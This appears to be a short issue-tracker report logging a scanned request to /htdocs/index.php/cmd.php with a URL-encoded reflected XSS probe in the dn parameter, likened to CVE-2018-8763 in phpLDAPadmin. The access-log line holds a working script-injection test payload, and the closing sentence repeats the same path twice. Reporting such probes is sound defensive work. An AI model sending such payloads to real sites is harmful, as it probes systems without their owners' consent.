GET /htdocs/index.php/cmd.php dn Parameter XSS #76
Description
server.bmw.yow.mybluehostin.me (162.240.233.90) - - [17/Nov/2025:13:25:22 -0700] "GET /htdocs/index.php/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1 HTTP/1.1" 308 465 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
This is similar to CVE-2018-8763 but that path is templates/3rdParty/pla/htdocs/cmd.php and templates/3rdParty/pla/htdocs/cmd.php